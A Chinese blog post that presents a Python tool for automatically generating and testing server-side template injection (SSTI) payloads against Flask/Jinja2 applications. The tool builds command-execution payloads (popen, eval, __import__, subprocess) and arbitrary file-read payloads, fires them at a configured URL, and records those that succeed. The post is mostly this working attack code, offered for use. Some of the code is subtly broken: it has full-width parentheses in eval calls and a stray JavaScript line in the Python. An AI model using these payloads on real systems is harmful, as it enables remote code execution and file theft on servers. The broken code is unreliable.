Python+Flask SSTI 注入payload自动生成

原创

忽如一夜春风来呸 2023-12-08 19:48:49 博主文章分类：网络安全 ©著作权

©著作权归作者所有：来自51CTO博客作者忽如一夜春风来呸的原创作品，请联系作者获取转载授权，否则将追究法律责任

抛开代码丑不谈，用起来还是挺好用滴。

from flask import Flask, request
from jinja2 import Template
from threading import Thread
import requests
import os

# 写入需注入的站点和url参数
site = "http://127.0.0.1:5000/waewe?404_url="


# url存储字典
url_dict = {
    "popen": [],
    "eval": [],
    "__import__": [],
    "subprocess": [],
}


# 通用[Python2、3]及绕过payload
currency_url = [
    "通用payload_rce: " + site + "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval（\"__import__('os').popen('whoami').read()\") }}{% endif %}{% endfor %}\n",
    "通用payload_任意文件读取_utf8: " + site + "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r', encoding='utf-8').read() }}{% endif %}{% endfor %}\n",
    "通用payload_任意文件读取_gbk: " + site + "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r', encoding='gbk').read() }}{% endif %}{% endfor %}\n"
]

# Python3特定payload，builtins也可以在Python2中使用
scan_list = {
    "popen": ("__init__.__globals__", "['popen']('whoami').read()"),
    "eval": ("__init__.__globals__['__builtins__']", "['eval'](\"__import__('os').popen('whoami').read()\")"),
    "__import__": ("__init__.__globals__['__builtins__']", "['__import__']('os').system('whoami')"),
    "subprocess": ("__init__.__globals__", "['subprocess'].check_output('whoami', shell=True).decode('gbk')"),
    # "subprocess": ("__init__.__globals__", "['subprocess'].check_output('dir', shell=True).decode('utf8')"),

}

def scan():
    num = 0
    for item in "".__class__.__base__.__subclasses__():
        try:
            for ii in scan_list:
                if ii in eval（"item." + scan_list[ii][0]):
                    url = "%s{{{}.__class__.__base__.__subclasses__()[%s].%s%s}}\n" % (
                        site,
                        num,
                        scan_list[ii][0],
                        scan_list[ii][1]
                    )
                    url_dict[ii].append(url)
            num += 1
        except:
            num += 1


def check_active(url, desc):
    with open("result.txt", "a", encoding="utf-8") as f:
        for i in url:
            status_code = requests.get(i).status_code
            if not status_code >= 500:
                f.write("利用" + desc + ": " + i)


if __name__ == '__main__':
    print("开始构造.....")
    scan()
    if os.path.exists("result.txt"):
        os.remove("result.txt")

    with open("result.txt", "a", encoding="utf-8") as f:
        for i in currency_url:
            f.write(i)

    t_list = []
    for i in url_dict:
        t = Thread(target=check_active, args=(url_dict[i], i,))
        t.start()
        t_list.append(t)

    for t in t_list:
        t.join()
    [1,2,3].slice(0,0)

    print("创建完成，请查看当前路径下的 result.txt 文件！！")